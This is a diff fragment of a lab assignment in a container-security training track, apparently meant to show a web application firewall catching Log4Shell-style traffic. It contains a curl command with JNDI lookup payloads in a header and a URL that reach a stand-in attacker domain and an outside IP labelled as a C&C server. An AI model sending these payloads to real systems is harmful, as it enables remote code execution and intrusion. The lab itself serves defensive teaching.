tigera-solutions/Instruqt/instruqt-tracks/container-security/04-waf-dpi/assignment.md

 kubectl exec -n dev -it multitool -- bash
 ```

-- Replace `SRV_IP` with the IP addreess of `vr-dev` service that you got from step #1, then run the query.
+- Run the malicious query that will leverage JNDI lookup method and connects to the attacker C&C server.

 ```
 curl -v -H 'User-Agent: ${jndi:dns://${SRV_IP.evildoer.xyz}' 'vr-dev.dev/$\{jndi:ldap://185.220.101.56:443/a\}'